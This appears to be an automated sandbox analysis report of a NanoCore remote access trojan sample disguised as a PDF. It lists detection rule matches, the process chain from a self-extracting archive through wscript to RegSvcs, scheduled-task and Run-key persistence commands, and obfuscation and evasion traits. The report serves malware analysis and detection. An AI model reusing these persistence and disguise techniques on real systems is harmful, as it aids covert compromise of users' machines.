Source: Process Memory Space: ihgsvw.exe PID: 5040, type: MEMORYSTR Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: ihgsvw.exe PID: 5040, type: MEMORYSTR Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: ihgsvw.exe PID: 5040, type: MEMORYSTR Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: Process Memory Space: ihgsvw.exe PID: 2788, type: MEMORYSTR Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: ihgsvw.exe PID: 2788, type: MEMORYSTR Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: ihgsvw.exe PID: 2788, type: MEMORYSTR Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: Process Memory Space: ihgsvw.exe PID: 5648, type: MEMORYSTR Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: ihgsvw.exe PID: 5648, type: MEMORYSTR Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: ihgsvw.exe PID: 5648, type: MEMORYSTR Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: Process Memory Space: ihgsvw.exe PID: 5304, type: MEMORYSTR Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: Process Memory Space: ihgsvw.exe PID: 5304, type: MEMORYSTR Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: ihgsvw.exe PID: 5304, type: MEMORYSTR Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00C0F122 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 6_2_00C0F122
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: String function: 003EF5F0 appears 31 times
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: String function: 003EEC50 appears 56 times
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: String function: 003EEB78 appears 39 times
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: String function: 00BC0DC0 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: String function: 00BBFD60 appears 39 times
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003D6FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW, 0_2_003D6FAA
Source: 004349256789197.pdf.scr.exe, 00000000.00000003.264105403.0000000006D09000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameGDWsrap.exe@ vs 004349256789197.pdf.scr.exe
Source: 004349256789197.pdf.scr.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe File created: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A
Source: classification engine Classification label: mal100.troj.evad.winEXE@43/45@28/1
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe File read: C:\Windows\win.ini
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003D6C74 GetLastError,FormatMessageW, 0_2_003D6C74
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003EA6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree, 0_2_003EA6C2
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\Update.vbs"
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe File created: C:\Program Files (x86)\DHCP Monitor
Source: 004349256789197.pdf.scr.exe ReversingLabs: Detection: 44%
Source: 004349256789197.pdf.scr.exe Virustotal: Detection: 39%
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe File read: C:\Users\user\Desktop\004349256789197.pdf.scr.exe
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\004349256789197.pdf.scr.exe C:\Users\user\Desktop\004349256789197.pdf.scr.exe
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" laklj-aowdkfxknm.xml.vbe
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe "C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe" ccmbpoh.docx
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmpA401.tmp
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe 0
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor Task" /xml "C:\Users\user\AppData\Local\Temp\tmpAA3C.tmp
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
Source: unknown Process created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe" 0
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\Update.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
Source: unknown Process created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe "C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe"
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process created: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\Update.vbs"
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\Update.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\wscript.exe" laklj-aowdkfxknm.xml.vbe
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe "C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe" ccmbpoh.docx
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmpA401.tmp
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor Task" /xml "C:\Users\user\AppData\Local\Temp\tmpAA3C.tmp
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe "C:\Users\user~1\AppData\Local\Temp\FOLDER~1\ihgsvw.exe" C:\Users\user~1\AppData\Local\Temp\FOLDER~1\CCMBPO~1.DOC
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe File created: C:\Users\user\AppData\Local\temp\Folder10_51
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00C24089 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear, 6_2_00C24089
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00C2AFDB CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, 6_2_00C2AFDB
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2220:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3956:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5116:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3696:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4876:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\{d95e5ad5-6193-4689-a919-7befded6bfa5}
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Command line argument: sfxname 0_2_003EDF1E
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Command line argument: sfxstime 0_2_003EDF1E
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Command line argument: STARTDLG 0_2_003EDF1E
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Command line argument: xzB 0_2_003EDF1E
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe File written: C:\Users\user\AppData\Local\Temp\Folder10_51\wfccrina.ini
Source: 22.2.RegSvcs.exe.720000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 22.2.RegSvcs.exe.720000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs Cryptographic APIs: 'CreateDecryptor'
Source: 22.2.RegSvcs.exe.720000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs Cryptographic APIs: 'TransformFinalBlock'
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: 004349256789197.pdf.scr.exe Static file information: File size 1181640 > 1048576
Source: 004349256789197.pdf.scr.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 004349256789197.pdf.scr.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 004349256789197.pdf.scr.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 004349256789197.pdf.scr.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 004349256789197.pdf.scr.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 004349256789197.pdf.scr.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: 004349256789197.pdf.scr.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: 004349256789197.pdf.scr.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 004349256789197.pdf.scr.exe, 00000000.00000000.244080048.0000000000403000.00000002.00000001.01000000.00000003.sdmp, 004349256789197.pdf.scr.exe, 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: RegSvcs.pdb, source: RegSvcs.exe, 0000000A.00000003.315104823.0000000001033000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000000.310040164.0000000000362000.00000002.00000001.01000000.0000000D.sdmp
Source: Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\NanoProtectPlugin\NanoProtectClient\obj\Debug\NanoProtectClient.pdb source: RegSvcs.exe, 0000000A.00000002.784950885.0000000006200000.00000004.00000001.00040000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.774805901.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000016.00000002.376441556.0000000003BE9000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000016.00000002.375961002.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: RegSvcs.pdb source: RegSvcs.exe, 0000000A.00000003.315104823.0000000001033000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000000.310040164.0000000000362000.00000002.00000001.01000000.0000000D.sdmp
Source: 004349256789197.pdf.scr.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 004349256789197.pdf.scr.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 004349256789197.pdf.scr.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 004349256789197.pdf.scr.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 004349256789197.pdf.scr.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation

Source: 22.2.RegSvcs.exe.720000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs .Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 22.2.RegSvcs.exe.720000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs .Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003EF640 push ecx; ret 0_2_003EF653
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Code function: 0_2_003EEB78 push eax; ret 0_2_003EEB96
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00C362CC pushad ; ret 6_2_00C362D6
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00BF0332 push edi; ret 6_2_00BF0333
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00BC0E06 push ecx; ret 6_2_00BC0E19
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00BA5D78 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 6_2_00BA5D78
Source: 004349256789197.pdf.scr.exe Static PE information: section name: .didat
Source: ihgsvw.exe.0.dr Static PE information: real checksum: 0x15a0e8 should be: 0x1560ce
Source: 004349256789197.pdf.scr.exe Static PE information: real checksum: 0x0 should be: 0x12da1b
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe File created: C:\Users\user\AppData\Local\Temp\Folder10_51\__tmp_rar_sfx_access_check_3874750
Source: 22.2.RegSvcs.exe.720000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 22.2.RegSvcs.exe.720000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe File created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe File created: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe File created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe

Boot Survival

Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AutoUpdate
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Chrome
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AutoUpdate C:\Users\user~1\AppData\Local\Temp\FOLDER~1\Update.vbs
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe" /create /f /tn "DHCP Monitor" /xml "C:\Users\user\AppData\Local\Temp\tmpA401.tmp

Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe File opened: C:\Users\user~1\AppData\Local\Temp\RegSvcs.exe:Zone.Identifier read attributes | delete
Source: Possible double extension: pdf.scr Static PE information: 004349256789197.pdf.scr.exe
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Code function: 6_2_00C325A0 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 6_2_00C325A0
Source: C:\Users\user\Desktop\004349256789197.pdf.scr.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Folder10_51\ihgsvw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
